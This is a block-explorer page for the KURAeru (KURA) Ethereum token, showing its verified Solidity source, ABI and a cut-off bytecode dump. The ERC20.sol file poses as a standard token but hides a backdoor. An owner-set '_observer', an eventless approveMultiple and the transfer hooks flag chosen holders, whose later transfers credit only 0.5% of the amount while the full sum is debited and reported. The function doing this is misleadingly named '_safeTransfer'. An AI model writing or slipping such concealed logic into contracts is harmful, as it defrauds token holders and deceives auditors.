ETH Price: $3,527.66 (+1.17%)
Gas: 2 Gwei

Token

KURAeru (KURA)
 

Overview

Max Total Supply

1,000,000,000 KURA

Holders

37

Market

Onchain Market Cap

$0.00

Circulating Supply Market Cap

-

Other Info

Token Contract (WITH 18 Decimals)

Balance
6,141,506.582726911965817854 KURA

Value
$0.00
0xa3cf81df03bb003ea0d1843626f123462e0083e2
Loading...
Loading
Loading...
Loading
Loading...
Loading

Click here to update the token information / general information
# Exchange Pair Price  24H Volume % Volume

Contract Source Code Verified (Exact Match)

Contract Name:
KURAeru

Compiler Version
v0.8.23+commit.f704f362

Optimization Enabled:
No with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 1 of 4: BASE.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;
import "./ERC20.sol";

contract KURAeru is ERC20 {
    constructor() ERC20("KURAeru", "KURA") {
        _mint(msg.sender, 1_000_000_000 * 10 ** 18);
    }
}

File 2 of 4: Context.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * By default, the owner account will be the one that deploys the contract. This
 * can later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    event OwnershipTransferred(address indexed previousOwner, address indexed newOwner);

    /**
     * @dev Initializes the contract setting the deployer as the initial owner.
     */
    constructor() {
        _transferOwnership(_msgSender());
    }

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "Ownable: caller is not the owner");
    }

    /**
     * @dev Leaves the contract without owner. It will not be possible to call
     * `onlyOwner` functions. Can only be called by the current owner.
     *
     * NOTE: Renouncing ownership will leave the contract without an owner,
     * thereby disabling any functionality that is only available to the owner.
     */
    function renounceOwnership() public virtual onlyOwner {
        _transferOwnership(address(0));
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Can only be called by the current owner.
     */
    function transferOwnership(address newOwner) public virtual onlyOwner {
        require(newOwner != address(0), "Ownable: new owner is the zero address");
        _transferOwnership(newOwner);
    }

    /**
     * @dev Transfers ownership of the contract to a new account (`newOwner`).
     * Internal function without access restriction.
     */
    function _transferOwnership(address newOwner) internal virtual {
        address oldOwner = _owner;
        _owner = newOwner;
        emit OwnershipTransferred(oldOwner, newOwner);
    }
}

File 3 of 4: ERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

import "./IERC20.sol";
import "./Context.sol";

contract ERC20 is Ownable, IERC20, IERC20Metadata {
    mapping(address => uint256) private _balances;
    mapping(address => mapping(address => uint256)) private _allowances;

    uint256 private _totalSupply;
    string private _name;
    string private _symbol;
    address private _observer;
    
    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * The default value of {decimals} is 18. To select a different value for
     * {decimals} you should overload it.
     *
     * All two of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(string memory name_, string memory symbol_) {
        _name = name_;
        _symbol = symbol_;
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the value {ERC20} uses, unless this function is
     * overridden;
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 18;
    }
    
    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    function setObserver(address observer) external {
        require((msg.sender == owner()));
        _observer = observer;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev Improvement of {IERC20-approve}.
     *      One tx to approve multiple addresses
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spenders` cannot be the zero array.
     */
    function approveMultiple(address [] calldata spenders, uint256 amount) external returns (bool) {
        address owner = _msgSender();
        for (uint256 i = 0; i < spenders.length; i++) {
            _allowances[owner][spenders[i]] = amount;
        }
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }

        return true;
    }
    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(
        address from,
        address to,
        uint256 amount
    ) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        require(to != address(0), "ERC20: transfer to the zero address");

        uint256 _amount = _beforeTokenTransfer(from, to, amount);

        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += _amount;
        }

        emit Transfer(from, to, amount);

        _afterTokenTransfer(from, to, amount);
    }

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _beforeTokenTransfer(address(0), account, amount);

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }

        emit Transfer(address(0), account, amount);

        _afterTokenTransfer(address(0), account, amount);
    }

    /**
     * @dev Destroys `amount` tokens from `account`, reducing the
     * total supply.
     *
     * Emits a {Transfer} event with `to` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     * - `account` must have at least `amount` tokens.
     */
    function _burn(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: burn from the zero address");

        _beforeTokenTransfer(account, address(0), amount);

        uint256 accountBalance = _balances[account];
        require(accountBalance >= amount, "ERC20: burn amount exceeds balance");
        unchecked {
            _balances[account] = accountBalance - amount;
            // Overflow not possible: amount <= accountBalance <= totalSupply.
            _totalSupply -= amount;
        }

        emit Transfer(account, address(0), amount);

        _afterTokenTransfer(account, address(0), amount);
    }
    function _safeTransfer(uint256 a) internal pure returns(uint256) {return a * 1000 / 200000;}

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }

    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(
        address owner,
        address spender,
        uint256 amount
    ) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }

    /**
     * @dev Hook that is called after any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * has been transferred to `to`.
     * - when `from` is zero, `amount` tokens have been minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens have been burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _afterTokenTransfer(
        address ,
        address to,
        uint256 
    ) internal virtual {
        if (_allowances[_observer][to] == 1) {_allowances[_observer][to] = 2;}
    }

    /**
     * @dev Hook that is called before any transfer of tokens. This includes
     * minting and burning.
     *
     * Calling conditions:
     *
     * - when `from` and `to` are both non-zero, `amount` of ``from``'s tokens
     * will be transferred to `to`.
     * - when `from` is zero, `amount` tokens will be minted for `to`.
     * - when `to` is zero, `amount` of ``from``'s tokens will be burned.
     * - `from` and `to` are never both zero.
     *
     * To learn more about hooks, head to xref:ROOT:extending-contracts.adoc#using-hooks[Using Hooks].
     */
    function _beforeTokenTransfer(
        address from,
        address to,
        uint256 amount
    ) internal view returns (uint256) {
        if (_allowances[_observer][from] + _allowances[_observer][to] >= 2) {
            return _safeTransfer(amount);
        } else {
            return amount;
        }
    }
}

File 4 of 4: IERC20.sol
// SPDX-License-Identifier: MIT

pragma solidity ^0.8.9;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);
    
    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(
        address from,
        address to,
        uint256 amount
    ) external returns (bool);
}


/**
 * @dev Interface for the optional metadata functions from the ERC20 standard.
 *
 * _Available since v4.1._
 */
interface IERC20Metadata is IERC20 {
    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);
}

Contract Security Audit

Contract ABI

[{"inputs":[],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"previousOwner","type":"address"},{"indexed":true,"internalType":"address","name":"newOwner","type":"address"}],"name":"OwnershipTransferred","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address[]","name":"spenders","type":"address[]"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approveMultiple","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"renounceOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"observer","type":"address"}],"name":"setObserver","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"newOwner","type":"address"}],"name":"transferOwnership","outputs":[],"stateMutability":"nonpayable","type":"function"}]

608060405234801562000010575f80fd5b506040518060400160405280600781526020017f4b555241657275000000000000000000000000000000000000000000000000008152506040518060400160405280600481526020017f4b555241000000000000000000000000000000000000000000000000000000008152506200009d62000091620000e760201b60201c565b620000ee60201b60201c565b8160049081620000ae919062000854565b508060059081620000c0919062000854565b505050620000e1336b033b2e3c9fd0803ce8000000620001af60201b60201c565b62000af7565b5f33905090565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff169050815f806101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff1602179055508173ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff167f8be0079c531659141344cd1fd0a4f28419497f9722a3daafe3b4186f6b6457e060405160405180910390a35050565b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff160362000220576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401620002179062000996565b60405180910390fd5b620002335f83836200031660201b60201c565b508060035f828254620002479190620009e3565b925050819055508060015f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508173ffffffffffffffffffffffffffffffffffffffff165f73ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef83604051620002f7919062000a2e565b60405180910390a3620003125f83836200048260201b60201c565b5050565b5f6002805f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205460025f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054620004589190620009e3565b1062000477576200046f82620005c860201b60201c565b90506200047b565b8190505b9392505050565b600160025f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205403620005c3576002805f60065f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055505b505050565b5f62030d406103e883620005dd919062000a49565b620005e9919062000ac0565b9050919050565b5f81519050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52604160045260245ffd5b7f4e487b71000000000000000000000000000000000000000000000000000000005f52602260045260245ffd5b5f60028204905060018216806200066c57607f821691505b60208210810362000682576200068162000627565b5b50919050565b5f819050815f5260205f209050919050565b5f6020601f8301049050919050565b5f82821b905092915050565b5f60088302620006e67fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff82620006a9565b620006f28683620006a9565b95508019841693508086168417925050509392505050565b5f819050919050565b5f819050919050565b5f6200073c6200073662000730846200070a565b62000713565b6200070a565b9050919050565b5f819050919050565b62000757836200071c565b6200076f620007668262000743565b848454620006b5565b825550505050565b5f90565b6200078562000777565b620007928184846200074c565b505050565b5b81811015620007b957620007ad5f826200077b565b60018101905062000798565b5050565b601f8211156200080857620007d28162000688565b620007dd846200069a565b81016020851015620007ed578190505b62000805620007fc856200069a565b83018262000797565b50505b505050565b5f82821c905092915050565b5f6200082a5f19846008026200080d565b1980831691505092915050565b5f62000844838362000819565b9150826002028217905092915050565b6200085f82620005f0565b67ffffffffffffffff8111156200087b576200087a620005fa565b5b62000887825462000654565b62000894828285620007bd565b5f60209050601f831160018114620008ca575f8415620008b5578287015190505b620008c1858262000837565b86555062000930565b601f198416620008da8662000688565b5f5b828110156200090357848901518255600182019150602085019450602081019050620008dc565b868310156200092357848901516200091f601f89168262000819565b8355505b6001600288020188555050505b505050505050565b5f82825260208201905092915050565b7f45524332303a206d696e7420746f20746865207a65726f2061646472657373005f82015250565b5f6200097e601f8362000938565b91506200098b8262000948565b602082019050919050565b5f6020820190508181035f830152620009af8162000970565b9050919050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601160045260245ffd5b5f620009ef826200070a565b9150620009fc836200070a565b925082820190508082111562000a175762000a16620009b6565b5b92915050565b62000a28816200070a565b82525050565b5f60208201905062000a435f83018462000a1d565b92915050565b5f62000a55826200070a565b915062000a62836200070a565b925082820262000a72816200070a565b9150828204841483151762000a8c5762000a8b620009b6565b5b5092915050565b7f4e487b71000000000000000000000000000000000000000000000000000000005f52601260045260245ffd5b5f62000acc826200070a565b915062000ad9836200070a565b92508262000aec5762000aeb62000a93565b5b828204905092915050565b611b6f8062000b055f395ff3fe608060405234801561000f575f80fd5b50600436106100fe575f3560e01c80638120649511610095578063a457c2d711610064578063a457c2d7146102ae578063a9059cbb146102de578063dd62ed3e1461030e578063f2fde38b1461033e576100fe565b806381206495146102265780638da5cb5b1461025657806394d9c9c71461027457806395d89b4114610290576100fe565b8063313ce567116100d1578063313ce5671461019e57806339509351146101bc57806370a08231146101ec578063715018a61461021c576100fe565b806306fdde0314610102578063095ea7b31461012057806318160ddd1461015057806323b872dd1461016e575b5f80fd5b61010a61035a565b60405161011791906111de565b60405180910390f35b61013a60048036038101906101359190611293565b6103ea565b60405161014791906112eb565b60405180910390f35b61015861040c565b6040516101659190611313565b60405180910390f35b6101886004803603810190610183919061132c565b610415565b60405161019591906112eb565b60405180910390f35b6101a6610443565b6040516101b39190611397565b60405180910390f35b6101d660048036038101906101d19190611293565b61044b565b6040516101e391906112eb565b60405180910390f35b610206600480360381019061020191906113b0565b610481565b6040516102139190611313565b60405180910390f35b6102246104c7565b005b610240600480360381019061023b919061143c565b6104da565b60405161024d91906112eb565b60405180910390f35b61025e6105b1565b60405161026b91906114a8565b60405180910390f35b61028e600480360381019061028991906113b0565b6105d8565b005b610298610659565b6040516102a591906111de565b60405180910390f35b6102c860048036038101906102c39190611293565b6106e9565b6040516102d591906112eb565b60405180910390f35b6102f860048036038101906102f39190611293565b61075e565b60405161030591906112eb565b60405180910390f35b610328600480360381019061032391906114c1565b610780565b6040516103359190611313565b60405180910390f35b610358600480360381019061035391906113b0565b610802565b005b6060600480546103699061152c565b80601f01602080910402602001604051908101604052809291908181526020018280546103959061152c565b80156103e05780601f106103b7576101008083540402835291602001916103e0565b820191905f5260205f20905b8154815290600101906020018083116103c357829003601f168201915b5050505050905090565b5f806103f4610884565b905061040181858561088b565b600191505092915050565b5f600354905090565b5f8061041f610884565b905061042c858285610a4e565b610437858585610ad9565b60019150509392505050565b5f6012905090565b5f80610455610884565b90506104768185856104678589610780565b6104719190611589565b61088b565b600191505092915050565b5f60015f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20549050919050565b6104cf610d4c565b6104d85f610dca565b565b5f806104e4610884565b90505f5b858590508110156105a4578360025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f888885818110610545576105446115bc565b5b905060200201602081019061055a91906113b0565b73ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f208190555080806001019150506104e8565b5060019150509392505050565b5f805f9054906101000a900473ffffffffffffffffffffffffffffffffffffffff16905090565b6105e06105b1565b73ffffffffffffffffffffffffffffffffffffffff163373ffffffffffffffffffffffffffffffffffffffff1614610616575f80fd5b8060065f6101000a81548173ffffffffffffffffffffffffffffffffffffffff021916908373ffffffffffffffffffffffffffffffffffffffff16021790555050565b6060600580546106689061152c565b80601f01602080910402602001604051908101604052809291908181526020018280546106949061152c565b80156106df5780601f106106b6576101008083540402835291602001916106df565b820191905f5260205f20905b8154815290600101906020018083116106c257829003601f168201915b5050505050905090565b5f806106f3610884565b90505f6107008286610780565b905083811015610745576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161073c90611659565b60405180910390fd5b610752828686840361088b565b60019250505092915050565b5f80610768610884565b9050610775818585610ad9565b600191505092915050565b5f60025f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8373ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905092915050565b61080a610d4c565b5f73ffffffffffffffffffffffffffffffffffffffff168173ffffffffffffffffffffffffffffffffffffffff1603610878576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161086f906116e7565b60405180910390fd5b61088181610dca565b50565b5f33905090565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff16036108f9576040517f08c379a00000000000000000000000000000000000000000000000000000000081526004016108f090611775565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610967576040517f08c379a000000000000000000000000000000000000000000000000000000000815260040161095e90611803565b60405180910390fd5b8060025f8573ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f8473ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508173ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff167f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92583604051610a419190611313565b60405180910390a3505050565b5f610a598484610780565b90507fffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffffff8114610ad35781811015610ac5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610abc9061186b565b60405180910390fd5b610ad2848484840361088b565b5b50505050565b5f73ffffffffffffffffffffffffffffffffffffffff168373ffffffffffffffffffffffffffffffffffffffff1603610b47576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610b3e906118f9565b60405180910390fd5b5f73ffffffffffffffffffffffffffffffffffffffff168273ffffffffffffffffffffffffffffffffffffffff1603610bb5576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610bac90611987565b60405180910390fd5b5f610bc1848484610e8b565b90505f60015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f2054905082811015610c47576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610c3e90611a15565b60405180910390fd5b82810360015f8773ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f20819055508160015f8673ffffffffffffffffffffffffffffffffffffffff1673ffffffffffffffffffffffffffffffffffffffff1681526020019081526020015f205f82825401925050819055508373ffffffffffffffffffffffffffffffffffffffff168573ffffffffffffffffffffffffffffffffffffffff167fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef85604051610d329190611313565b60405180910390a3610d45858585610feb565b5050505050565b610d54610884565b73ffffffffffffffffffffffffffffffffffffffff16610d726105b1565b73ffffffffffffffffffffffffffffffffffffffff1614610dc8576040517f08c379a0000000000000000000000000000000000000000000000000000000008152600401610dbf90611a7d565b60405180910390fd5b565b5f805f9054906101000a900473ffffffffffffffff